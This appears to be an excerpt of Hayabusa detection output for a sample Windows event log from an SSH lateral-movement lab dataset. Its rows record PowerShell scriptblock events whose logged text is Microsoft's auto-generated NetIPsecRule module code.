[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 